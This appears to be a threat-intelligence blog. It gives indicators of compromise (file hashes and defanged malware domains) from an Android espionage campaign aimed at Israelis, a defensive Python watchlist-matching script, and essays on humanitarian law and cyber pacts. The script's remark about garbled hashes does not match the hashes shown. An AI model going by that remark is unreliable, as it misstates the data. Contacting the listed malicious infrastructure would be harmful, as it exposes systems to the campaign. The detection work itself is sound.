The file with the Spanish-language filename and Colombia-related decoy video remains something of an outlier given this activity's focus on Israeli targets. Kaspersky's Desert Falcons report actually indicates a much larger target scope for this adversary, with targets in numerous sectors located in nearly 50 countries; however, none of the countries on that list is Spanish-speaking. It is possible that the Spanish-language decoy was meant to target Spanish-speaking individuals in non-Spanish-speaking countries, or that it was used for some unknown reason.

Malicious Files

b8237782486a26d5397b75eeea7354a777bff63a
09c3af7b0a6957d5c7c80f67ab3b9cd8bef88813
9b923303f580c999f0fdc25cad600dd3550fe4e0
0b58c883efe44ff010f1703db00c9ff4645b59df
0a5dc47b06de545d8236d70efee801ca573115e7
782a0e5208c3d9e8942b928857a24183655e7470
5f71a8a50964dae688404ce8b3fbd83d6e36e5cd
03b404c8f4ead4aa3970b26eeeb268c594b1bb47

Domains

androidbak[.]com
droidback[.]com
endpointup[.]com
siteanalysto[.]com
goodydaddy[.]com
oowdesign[.]com
audioodrivers[.]com
androidmobgate[.]com
dooownloads[.]com
droidcart[.]com
fastdroidmob[.]com 
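The indicators above are only useful once they are turned into something that can be run against data. The following script is an added example and is not part of the original post or CCP's tooling. It refangs the defanged domains and validates the SHA-1 hashes, reproduces the registrant-email pivot that tied fastdroidmob[.]com to the rest of the infrastructure (on constructed WHOIS records, not a live lookup; only fastdroidmob[.]com's registrant address is stated in the post), and matches the watchlist against constructed proxy/DNS log lines and a constructed file inventory. Two of the listed hashes were printed with a lowercase "l" in a hex position; the script uses them with that character read as the digit "1", which is an assumption, and the validation check is what would catch the garbled form if it were pasted in as printed.

```python
"""
Added example (not from the original post): build a watchlist from the
defanged IOCs listed above and run it against constructed sample data.

Shown here:
  1. the registrant-email pivot used in the analysis, on constructed WHOIS
     records (only fastdroidmob.com's registrant is stated in the post), and
  2. matching refanged domains (including subdomains) and validated SHA-1
     hashes against constructed proxy/DNS log lines and a file inventory.
"""
import re

# Domains exactly as listed in the post, still defanged.
DEFANGED_DOMAINS = [
    "androidbak[.]com", "droidback[.]com", "endpointup[.]com",
    "siteanalysto[.]com", "goodydaddy[.]com", "oowdesign[.]com",
    "audioodrivers[.]com", "androidmobgate[.]com", "dooownloads[.]com",
    "droidcart[.]com", "fastdroidmob[.]com",
]

# SHA-1 hashes from the post's "Malicious Files" list. Two of them were
# printed with an "l" where hex requires a digit; "1" is assumed here.
SHA1_HASHES = [
    "b8237782486a26d5397b75eeea7354a777bff63a",
    "09c3af7b0a6957d5c7c80f67ab3b9cd8bef88813",
    "9b923303f580c999f0fdc25cad600dd3550fe4e0",
    "0b58c883efe44ff010f1703db00c9ff4645b59df",
    "0a5dc47b06de545d8236d70efee801ca573115e7",
    "782a0e5208c3d9e8942b928857a24183655e7470",
    "5f71a8a50964dae688404ce8b3fbd83d6e36e5cd",
    "03b404c8f4ead4aa3970b26eeeb268c594b1bb47",
]

SHA1_RE = re.compile(r"^[0-9a-f]{40}$")
# Hostname-looking tokens: labels separated by dots, ending in an alphabetic TLD.
HOST_RE = re.compile(r"[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def refang(indicator):
    """Reverse the usual defanging conventions: [.] -> . , [@] -> @ , hxxp -> http."""
    return indicator.replace("[.]", ".").replace("[@]", "@").replace("hxxp", "http")


def valid_sha1(digest):
    """True only for a well-formed 40-character hex SHA-1 (catches OCR/typo damage)."""
    return bool(SHA1_RE.match(digest.lower()))


def pivot_on_registrant(whois_records, email):
    """Return every domain whose WHOIS registrant email matches, case-insensitively."""
    email = email.lower()
    return sorted(d for d, rec in whois_records.items()
                  if rec.get("registrant_email", "").lower() == email)


def match_domains(log_lines, domains):
    """Return (line_no, host, ioc) for each hostname in a log line that equals an
    IOC domain or is a subdomain of one; substrings such as notfastdroidmob.com
    are deliberately not matched."""
    wanted = sorted(d.lower() for d in domains)
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        for token in HOST_RE.findall(line):
            host = token.lower().strip(".")
            for ioc in wanted:
                if host == ioc or host.endswith("." + ioc):
                    hits.append((line_no, host, ioc))
    return hits


def match_hashes(inventory, hashes):
    """Return (path, sha1) for inventory entries whose hash is on the watchlist."""
    wanted = {h.lower() for h in hashes if valid_sha1(h)}
    return sorted((path, h) for path, h in inventory.items() if h.lower() in wanted)


# --- constructed sample data (not real records) ---------------------------
WHOIS = {
    "fastdroidmob.com": {"registrant_email": "info@palgoal.ps"},   # stated in the post
    "droidcart.com": {"registrant_email": "INFO@palgoal.ps"},      # constructed
    "legit-shop.example": {"registrant_email": "admin@example.net"},  # constructed
}
SAMPLE_LOGS = [
    "2016-06-12T08:14:02Z proxy src=10.0.0.5 GET http://update.fastdroidmob.com/app.apk ua=AudioDrive",
    "2016-06-12T08:14:09Z dns 10.0.0.5 query A notfastdroidmob.com",
    "2016-06-12T09:01:44Z dns 10.0.0.7 query A www.oowdesign.com.",
    "2016-06-12T09:02:10Z proxy src=10.0.0.7 GET https://www.example.com/index.html",
]
SAMPLE_INVENTORY = {
    "/sdcard/Download/video.apk": "b8237782486a26d5397b75eeea7354a777bff63a",
    "/sdcard/Download/notes.txt": "da39a3ee5e6b4b0d3255bfef95601890afd80709",  # SHA-1 of empty input
}

DOMAINS = [refang(d) for d in DEFANGED_DOMAINS]

if __name__ == "__main__":
    print("pivot:", pivot_on_registrant(WHOIS, refang("info[@]palgoal[.]ps")))
    print("domain hits:", match_domains(SAMPLE_LOGS, DOMAINS))
    print("hash hits:", match_hashes(SAMPLE_INVENTORY, SHA1_HASHES))
```

Hostnames are extracted as whole tokens and compared by label suffix rather than with a substring search, so a lookalike such as notfastdroidmob[.]com does not fire while update.fastdroidmob[.]com does; the trailing dot that DNS logs often append is stripped before comparison.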

A Case For Including Disruptive Cyber Operations Under IHL

A recent paper by Kilovaty in the Michigan Telecommunications and Technology Law Review covers a topic that is extremely relevant right now. The paper argues that "disruptive" cyber operations are a new form of violence that should be folded into the more traditional view of "attack" under international humanitarian law (IHL). It draws attention to a current debate over whether a cyber operation must result in physical damage, injury, or death to a civilian population in order to be considered an attack. It is widely accepted that a cyber operation that does produce such kinetic effects is an attack under IHL, which triggers IHL's principles of distinction and proportionality. However, it is unclear whether operations that only interrupt the functionality of a system, or "disruptive" operations, without kinetic effect should fall into the category of attacks.

Kilovaty’s paper uses the December 2015 operations against Ukraine’s power grid that resulted in widespread power outages as a real world example to illustrate his point that “cyber operations that do not result in direct kinetic effects such as death, injury, or physical destruction” are considered by many not to qualify as attacks and therefore do not trigger IHL considerations. The reason Kilovaty’s paper is extremely relevant right now is that there are actually a couple of much more recent campaigns with similar effects that further illustrate this point.

Since November 2016, there has been an unusually high frequency of destructive/disruptive cyber operations against government and critical infrastructure targets in Saudi Arabia and Ukraine, suspected to have been carried out by nation-state actors in Iran and Russia respectively. They began around mid-November 2016, when reports emerged that destructive malware had crippled the networks of government organizations and the agency responsible for running airports in Saudi Arabia. That initial round of incidents was followed by a second at the end of November and a third in late January 2017. This final wave reportedly hit a wide array of government and private sector organizations in Saudi Arabia. Analysis of the malware used revealed it to be a new version of the Shamoon (or Disttrack) malware used in a 2012 cyber attack against a company in Saudi Arabia that is believed to have been carried out by operators in Iran. While no definitive attribution has been made for the recent incidents, the similarity in malware and targeting is indicative of an Iranian actor.

During the same late 2016 to early 2017 timeframe, a separate wave of operations, unrelated to those in Saudi Arabia, occurred in Ukraine. On December 6 Ukraine's Ministry of Finance announced that it was the victim of a "coordinated cyber attack" that destroyed data and blocked access to its network. Media reports indicated that the treasury service and pension fund were also affected, which resulted in pension and other government payments being blocked. In addition to the incidents against these financial agencies, there was also a suspected operation against the Ukrainian power company Ukrenergo (http://www.reuters.com/article/us-ukraine-cyber-attack-energy-idUSKBN1521BA), which resulted in blackouts in Kiev.

Analysis of the malware and tactics used in these operations revealed them to be similar to those used in the previously mentioned December 2015 attack that left hundreds of thousands without electricity in western Ukraine. Although never definitively tied to the Russian government, the choice of target and sophistication of the operations point to a Russian actor.

Because of the types of malware used in the incidents described above, it is possible they would be considered attacks even under the current reading of IHL: the destructive malware may have rendered affected systems so inoperable that physical computers or components had to be replaced. That is a form of physical damage that would meet the current definition of "attack"; however, it is unclear whether physical replacement was actually necessary. If it was not, and the malware merely interfered with the victim systems without physical damage, then these incidents may not be considered attacks under IHL but only disruptive operations.

The conclusion that these incidents would not be considered attacks, and therefore that IHL principles should not apply, merely because they did not result in the need to physically replace affected systems seems absurd. The 2015 operation against Ukraine's electrical grid is a good example. Assume that the attackers only used their access to manipulate controls and shut off the power, and did not use malware with a destructive effect. The incident knocked out power to hundreds of thousands of people in late December. Shutting off the power in late December in an area where it can get quite cold could easily result in civilian casualties. While there do not appear to be any reported injuries or deaths resulting from the outage, why should that be the measuring stick? Must someone be hurt or killed before it is considered an attack? Other, non-weather-related casualties could also result when power is lost. Yet under a rule that requires physical damage to property or civilian injury or death before a cyber operation can be labeled an attack, the 2015 Ukraine incident would not qualify unless the malware used had a destructive effect.

Including disruptive cyber operations against critical systems under the current "attack" umbrella would bring IHL's principles of distinction and proportionality into play. This would require those launching disruptive operations to understand the nature of the systems being targeted: if attacking a particular system would result in widespread, indiscriminate harm, the operation cannot go forward. Applying IHL to disruptive operations would place more of a burden on operators, which many governments may oppose; however, withholding IHL protections from disruptive operations against systems critical to civilian populations seems to undermine IHL's humanitarian goal.

Gentlemen's Agreement: Chinese And Russian Hacking In Wake of 2015 Cyber Pact

Yesterday, the Council on Foreign Relations published a blog post regarding a public report from Qihoo, a Chinese cybersecurity company, that mentioned the targeting of China by the Russia-based hacker group known as APT28/FANCY BEAR. CFR drew attention to this because APT28 operations targeting China could be in violation of a 2015 agreement between Russia and China in which the two countries agreed not to engage in "computer attacks" or other cyber operations that might result in "misuse" or "unsanctioned interference" with the other country's "information resources."

CFR's blog post points out that the ambiguity in the terms of the Russia-China agreement allows for a broad range of interpretation, which leaves room for the two countries to engage in cyber operations against each other without violating the agreement. In particular, the "misuse" and "interference" terms leave a significant amount of room for interpretation.

Even if APT28 has been hacking China, the Russians are not the only ones who may have carried out such operations in the wake of the agreement. Cyber espionage activity targeting Russia and linked to Chinese actors continued at a significant pace after the agreement was reached in April 2015. The cybersecurity company Proofpoint published a couple of blog posts (here and here) detailing a long-running campaign by a group it refers to as TA459 targeting Russian organizations in the military and telecommunications sectors. This campaign involved a number of malware families (PlugX, NetTraveler, and Saker) historically linked to Chinese operators.

In the end, it is unlikely that Russia and China would find the actions of APT28 or TA459 to be in violation of the April 2015 agreement. This is because, at least in TA459's case, the activity appears to be traditional espionage rather than computer attacks or intrusions aimed at providing commercial advantage to the perpetrator. The Russia-China agreement does not mention cyber espionage aimed at commercial advantage, but such activity may be more likely to be viewed as a violation. In fact, commercial cyber espionage was the crux of the agreement between the US and China a few months later. While the US-China agreement was also somewhat ambiguous about how a commercial motive was to be determined, like the Russia-China pact it contained no language that would preclude traditional cyber espionage.

As the CFR blog post ultimately concludes, Qihoo's report of APT28 operations targeting China is unlikely to provoke a reaction from Beijing. This underscores the fact that, despite agreements like those between Russia and China and between the US and China, cyber espionage is going to continue. The cyber domain is becoming increasingly central to the geopolitical and military activities of countries across the globe. None of these countries will wish to limit their own activities through international agreements more than they have to, so while such agreements can have positive effects in curbing things like commercial espionage or computer attacks, both public and private organizations are likely to remain targets of cyber operations by nation-state actors.